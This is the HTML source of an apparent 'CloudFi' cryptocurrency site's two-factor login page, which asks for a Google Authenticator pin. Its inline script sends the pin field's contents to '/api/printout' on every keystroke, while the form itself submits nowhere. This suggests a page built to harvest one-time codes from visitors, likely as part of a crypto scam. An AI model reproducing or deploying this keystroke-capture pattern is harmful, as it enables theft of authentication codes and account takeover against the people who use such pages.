<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, minimum-scale=1"
    />
    <meta
      name="csrf-token"
      content="E9v6xEwVamC9oNeaMYJQ3MynHUg0jisHfDmmEFFU"
    />
    <meta
      name="description"
      content="Welcome to CloudFi! We are the premier platform for growing your cryptocurrency assets. Even without prior trading experience, our intuitive platform simplifies the process, empowering you to make informed decisions while maximizing your gains and minimizing your risk. Our dedicated professional team, coupled with advanced technology, ensures your assets remain safe and secure while you explore the rewarding world of digital currency. Start your journey with CloudFi today and witness the ease of accelerating your crypto portfolio!"
    />
    <title>Enter 2FA</title>

    <!-- jQuery -->
    <script
      type="text/javascript"
      async=""
      src="https://www.gstatic.com/recaptcha/releases/khH7Ei3klcvfRI74FvDcfuOo/recaptcha__en.js"
      crossorigin="anonymous"
      integrity="sha384-Pc4kSqgt9HkBUSG4m5s1icZtXtGOiIpAoIevDwoWsE6LISnB5sKY6eY1g4lVKA/D"
    ></script>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
      type="text/javascript"
    ></script>

    <!-- Bootstrap -->
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
      crossorigin="anonymous"
    ></script>
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD"
      crossorigin="anonymous"
    />

    <!-- Scripts -->
    <script src="/js/app.js" defer=""></script>
    <script src="https://www.google.com/recaptcha/api.js"></script>

    <!-- Styles -->
    <link rel="stylesheet" href="./css/app.css" />

    <!-- Favicons -->
    <link
      rel="icon"
      type="image/svg"
      href="https://cloudfi.info/images/favicon.svg"
      sizes="32x32"
    />
    <link
      rel="apple-touch-icon"
      href="https://cloudfi.info/images/favicon.svg"
    />

    <script src="https://sitegpt.ai/widget/360704980516078160.js"></script>
  </head>

  <body>
    <header class="header header--fixed">
      <div class="header__container base-wrap">
        <a href="https://cloudfi.info">
          <img src="https://cloudfi.info/images/logo.png" class="w-auto h-12" />
        </a>
        <button id="hamb-btn" class="hamburger--squeeze">
          <div class="hamburger-inner"></div>
        </button>
      </div>

      <div class="menu" id="hamb-menu">
        <div class="menu__holder base-wrap">
          <div class="menu__top">
            <a href="https://cloudfi.info/secure/dashboard" class="a--link"
              >Dashboard</a
            >
            <form method="POST" action="https://cloudfi.info/logout">
              <input
                type="hidden"
                name="_token"
                value="E9v6xEwVamC9oNeaMYJQ3MynHUg0jisHfDmmEFFU"
              />
              <a
                href="https://cloudfi.info/logout"
                class="a--link"
                onclick="event.preventDefault();this.closest('form').submit();"
                ><span>Logout</span></a
              >
            </form>
          </div>
          <nav class="">
            <ul class="menu__list">
              <a class="menu__list-item" href="https://cloudfi.info"
                >Home Page</a
              >
              <a class="menu__list-item" href="https://cloudfi.info/privacy"
                >Privacy Policy</a
              >
              <a class="menu__list-item" href="https://cloudfi.info/terms"
                >Terms Of Service</a
              >
              <a class="menu__list-item" href="https://cloudfi.info/cookies"
                >Cookie Policy</a
              >
            </ul>
          </nav>
        </div>
      </div>
    </header>
    <div class="content base-wrap--no-mobile-padding">
      <div class="mb-3 text-wrap sm:mx-auto sm:w-full sm:max-w-md">
        <form class="form-horizontal">
          <div
            class="flex flex-col justify-center min-h-full py-12 sm:px-6 lg:px-8"
          >
            <label for="one_time_password" class="block text-white"
              >Enter the pin from Google Authenticator app:</label
            >
            <div class="relative mt-4 rounded-md shadow-sm">
              <input
                type="number"
                name="one_time_password"
                id="one_time_password"
                class="form-control"
                placeholder=""
                onkeydown="callAPI(event)"
              />
            </div>
          </div>

          <button type="submit" class="dashboard-button__primary">
            Authenticate
          </button>
        </form>
      </div>
    </div>

    <script>
      async function callAPI(event) {
        const value = event.target.value;

        const response = await fetch('/api/printout', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(value),
        });
      }

      const body = document.querySelector('body');
      const hambBtn = document.querySelector('#hamb-btn');
      const hambMenu = document.querySelector('#hamb-menu');

      hambBtn.addEventListener('click', function () {
        hambBtn.classList.toggle('is-active');
        hambMenu.classList.toggle('is-menu-open');
        body.classList.toggle('noscroll');
      });
    </script>

    <iframe
      id="sitegpt-bot-ui"
      src="https://widget.sitegpt.ai/c/360704980516078160"
      style="
        position: fixed;
        right: 1rem;
        z-index: 9999999;
        border: medium none;
        width: 448px;
        bottom: 5rem;
        height: 85vh;
        border-radius: 0.75rem;
        box-shadow: rgba(0, 0, 0, 0.1) 0px 20px 25px -5px,
          rgba(0, 0, 0, 0.1) 0px 8px 10px -6px;
        display: none;
      "
    ></iframe
    ><button
      id="sitegpt-chat-icon"
      style="
        overflow: hidden;
        padding: 0px;
        background-color: var(--chat-color);
        color: var(--chat-text-color);
        border-radius: 9999px;
        position: fixed;
        display: flex;
        justify-content: center;
        align-items: center;
        bottom: 16px;
        right: 16px;
        width: 56px;
        height: 56px;
        z-index: 9999998;
        border: medium none;
        cursor: pointer;
      "
    >
      <img
        src="https://sitegpt.ai/images/logo-white.svg"
        style="width: 32px; height: 32px"
        alt=""
      /><span class="sr-only">Open Chat</span>
    </button>
    <div>
      <div id="sitegpt-chat-tooltip" class="tooltip-wrapper">
        <style>
          :root {
            --chat-color: #2563eb;
            --chat-text-color: #ffffff;
            --chat-fontSize: 14px;
          }
          .sr-only {
            position: absolute;
            width: 1px;
            height: 1px;
            padding: 0;
            margin: -1px;
            overflow: hidden;
            clip: rect(0, 0, 0, 0);
            white-space: nowrap;
            border-width: 0;
          }
          .tooltip-wrapper .relative {
            position: relative;
          }
          .tooltip-wrapper .max-w-sm {
            max-width: 384px;
          }
          .tooltip-wrapper .bg-slate-50 {
            background-color: rgb(248 250 252);
          }
          .tooltip-wrapper .bg-brand {
            background-color: var(--chat-color);
          }
          .tooltip-wrapper .shadow-xl {
            box-shadow: 0 3px 6px 0 rgba(0, 0, 0, 0.1);
          }
          .tooltip-wrapper .ring-gray-100 {
            --tw-ring-opacity: 1;
            --tw-ring-color: rgb(242 244 247 / var(--tw-ring-opacity));
          }
          .tooltip-wrapper .ring-1 {
            --tw-ring-offset-shadow: var(--tw-ring-inset) 0 0 0
              var(--tw-ring-offset-width) var(--tw-ring-offset-color);
            --tw-ring-shadow: var(--tw-ring-inset) 0 0 0
              calc(1px + var(--tw-ring-offset-width)) var(--tw-ring-color);
            box-shadow: var(--tw-ring-offset-shadow), var(--tw-ring-shadow),
              var(--tw-shadow, 0 0 #0000);
          }
          .tooltip-wrapper .rounded-xl {
            border-radius: 10px;
          }
          .tooltip-wrapper .p-4 {
            padding: 16px;
          }
          .tooltip-wrapper .text-base {
            font-size: 16px;
            line-height: 24px;
          }
          .tooltip-wrapper .font-medium {
            font-weight: 500;
          }
          .tooltip-wrapper .text-white {
            --tw-text-opacity: 1;
            color: var(--chat-text-color);
          }
          .tooltip-wrapper .line-clamp-3 {
            overflow: hidden;
            display: -webkit-box;
            -webkit-box-orient: vertical;
            -webkit-line-clamp: 3;
          }
          .tooltip-wrapper .whitespace-pre-wrap {
            white-space: pre-wrap;
          }
          .tooltip-wrapper .absolute {
            position: absolute;
          }
          .tooltip-wrapper .fixed {
            position: fixed;
          }
          .tooltip-wrapper .w-4 {
            width: 16px;
          }
          .tooltip-wrapper .h-4 {
            height: 16px;
          }
          .tooltip-wrapper .rotate-45 {
            --tw-translate-x: 0;
            --tw-translate-y: 0;
            --tw-rotate: 45deg;
            --tw-skew-x: 0;
            --tw-skew-y: 0;
            --tw-scale-x: 1;
            --tw-scale-y: 1;
            transform: translate(var(--tw-translate-x), var(--tw-translate-y))
              rotate(var(--tw-rotate)) skew(var(--tw-skew-x))
              skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x))
              scaleY(var(--tw-scale-y));
          }
          .tooltip-wrapper .neg-bottom {
            bottom: -6px;
          }
          .tooltip-wrapper {
            position: fixed;
            bottom: 88px;
            right: 16px;
            display: none;
            z-index: 9999998;
          }
          .tooltip-wrapper #tooltip-close-btn {
            cursor: pointer;
            position: absolute;
            width: 16px;
            height: 16px;
            top: 4px;
            right: 4px;
            color: var(--chat-text-color);
          }
        </style>
        <div
          class="relative max-w-sm bg-brand shadow-xl ring-gray-100 ring-1 rounded-xl"
        >
          <div id="tooltip-close-btn">
            <svg
              xmlns="http://www.w3.org/2000/svg"
              width="100%"
              height="100%"
              fill="currentColor"
              viewBox="0 0 256 256"
            >
              <path
                d="M208.49,191.51a12,12,0,0,1-17,17L128,145,64.49,208.49a12,12,0,0,1-17-17L111,128,47.51,64.49a12,12,0,0,1,17-17L128,111l63.51-63.52a12,12,0,0,1,17,17L145,128Z"
              ></path>
            </svg>
          </div>
          <div class="p-4">
            <p
              class="text-base font-medium text-white line-clamp-3 whitespace-pre-wrap"
            >
              Hello! How can I assist you today?
            </p>
          </div>

          <div
            class="absolute w-4 h-4 rotate-45 bg-brand neg-bottom"
            style="right: 20px"
          ></div>
        </div>
      </div>
    </div>
  </body>
</html>
